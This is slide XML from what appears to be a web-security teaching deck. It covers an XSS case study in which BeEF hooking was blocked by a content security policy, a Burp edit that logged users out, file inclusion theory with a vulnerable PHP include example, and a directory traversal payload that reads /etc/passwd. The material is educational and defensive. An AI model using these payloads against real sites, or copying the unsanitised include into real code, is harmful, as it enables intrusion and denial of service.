            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Real World Case Study – Protections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{216A2FFA-BECB-4C2A-8980-8D9F44B7F232}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1878496" y="4324673"/>
            <a:ext cx="848098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I tried to use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BeEF</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 to hook victims as they visit the page, but the content security policy prevented scripts from reaching out to anything that was not white-listed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This also meant I could not get cookies as shown above – no exfiltration of data possible without other steps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{548E2276-50D4-48A5-9BDD-DE8F92686E24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2055677" y="1579286"/>
            <a:ext cx="8123234" cy="2664101"/>
            <a:chOff x="2055677" y="1579286"/>
            <a:chExt cx="8123234" cy="2664101"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05BB55DD-C9A8-465E-BD05-40C5D0AAE36E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2055677" y="1579286"/>
              <a:ext cx="7639050" cy="1552575"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Picture 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75B68EF3-3DEF-423B-A275-D12F1346C7D6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2768461" y="2614612"/>
              <a:ext cx="7410450" cy="1628775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F16FF79-D7E0-4820-8B9C-9A3790BD91D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8566201" y="1201644"/>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Inspector</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9BF22C4-14EA-49BE-8DE2-517154E9BC94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8955499" y="3874055"/>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Inspector</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131597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103DA-77F0-4718-81B9-E8760B3291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95A758D1-DC40-44C0-9D70-F92B266ACA41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Real World Case Study – Getting Malicious</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D31F1041-7DF7-4EFD-8297-F997FD513F58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="37701"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="323012" y="1353247"/>
            <a:ext cx="5521197" cy="1218581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68995A9E-CE8F-44F9-9246-0BD2800C0AFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5844209" y="1485041"/>
            <a:ext cx="48765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Inspector shows a hidden form element used in the login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B401012-D3EF-4E2B-A8D8-29169290A9A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="587795" y="2314349"/>
            <a:ext cx="9429750" cy="619125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3313EF2F-4FBE-43DB-8D88-0BDC47059967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect b="76558"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1511182" y="2824413"/>
            <a:ext cx="4740676" cy="1311978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0FED21A-FE07-43DA-89CF-B936EA060CFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6336840" y="3113231"/>
            <a:ext cx="48765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Using Burp to delete this from the request triggered an immediate logout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A2D4E65-9B2C-448E-ACB4-276858CC50D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="326541" y="4678560"/>
            <a:ext cx="7781925" cy="1476375"/>
            <a:chOff x="743985" y="4678560"/>
            <a:chExt cx="7781925" cy="1476375"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="Picture 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77A939A9-421E-441F-9A59-6E8675AC5DFA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="743985" y="4678560"/>
              <a:ext cx="7781925" cy="1476375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Rectangle 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA1B130F-7BAC-43CF-9C3D-83999A257DEE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4234070" y="5777555"/>
              <a:ext cx="4264468" cy="31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3" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F2B1974-5567-4242-BC07-F2495226447C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8108466" y="4678560"/>
            <a:ext cx="366995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Denial of service for any users trying to log in. Easily reversed, but could be frustrating to find the source</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4D3B74-2ECA-4E5F-A9F3-8DAF6B7AC647}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4690964" y="1333962"/>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Inspector</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0DE1284-45FD-42B0-B57B-25C938B6C7F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6912426" y="4659275"/>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Inspector</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BA616C9-F69E-4FEB-A6DF-8D0E03F1FC75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9294270" y="2583427"/>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Burp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242088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AA027-620C-4481-A775-CA26B0AB0F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29F967CD-0F44-4F64-BCCC-6337A6C32FD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recent XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9971A53D-4A2A-4FF6-A992-F03DD779A275}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AirTags</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credential theft is the biggest concern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https://krebsonsecurity.com/2021/09/apple-airtag-bug-enables-good-samaritan-attack/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0A799B6-BDB9-4CA6-B92C-A4231CB8E085}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4618764" y="2277117"/>
            <a:ext cx="2954472" cy="2878282"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="490340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File Inclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103661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A51831-90DF-45E7-90C3-A8F2A9DFCE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02050B0-7F92-4F26-BABB-12C26C7FB991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A little theory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A7FB002-C7EE-47F5-AFEA-DC4756BABF88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="6910801" cy="4986130"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caused by failure to sanitize parameters passed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" alt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&lt;?php include($_GET['file']); ?&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local file inclusion (LFI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access files on the server likely leveraging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>directory traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Remote file inclusion (RFI) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>oa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>d files from other systems</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EAEDBB5-58C3-4642-8E94-53358888653A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7325139" y="754034"/>
            <a:ext cx="4746642" cy="5423296"/>
            <a:chOff x="6848667" y="541176"/>
            <a:chExt cx="5271798" cy="5701004"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7" descr="A picture containing laser, light, scene, dark&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA5493AD-7961-46C9-B9AF-EF577307A00E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>
            <a:srcRect l="35413"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6913984" y="541176"/>
              <a:ext cx="5122232" cy="5701004"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8695EBA7-BC10-4959-B22D-FB2E298D916C}"/>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F576407E-91C4-4561-A1ED-1F568CE9EE2C}"/>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994684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ED449-E11D-4180-B6F1-612E4CFD12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7546283-C9DB-49E7-A3E5-AB89F903CF36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directory Traversal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2E3986D-F68F-4A50-A8EA-20DD5FB01093}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="7328244" cy="5174326"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leverages relative file paths to access other folders on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similar to traversing in Linux, can use ../ to move up directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Experimentation and Documentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start with learning where the root likely is; e.g., /var/www/html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To get to /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd: ../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May need to encode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 	../ 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
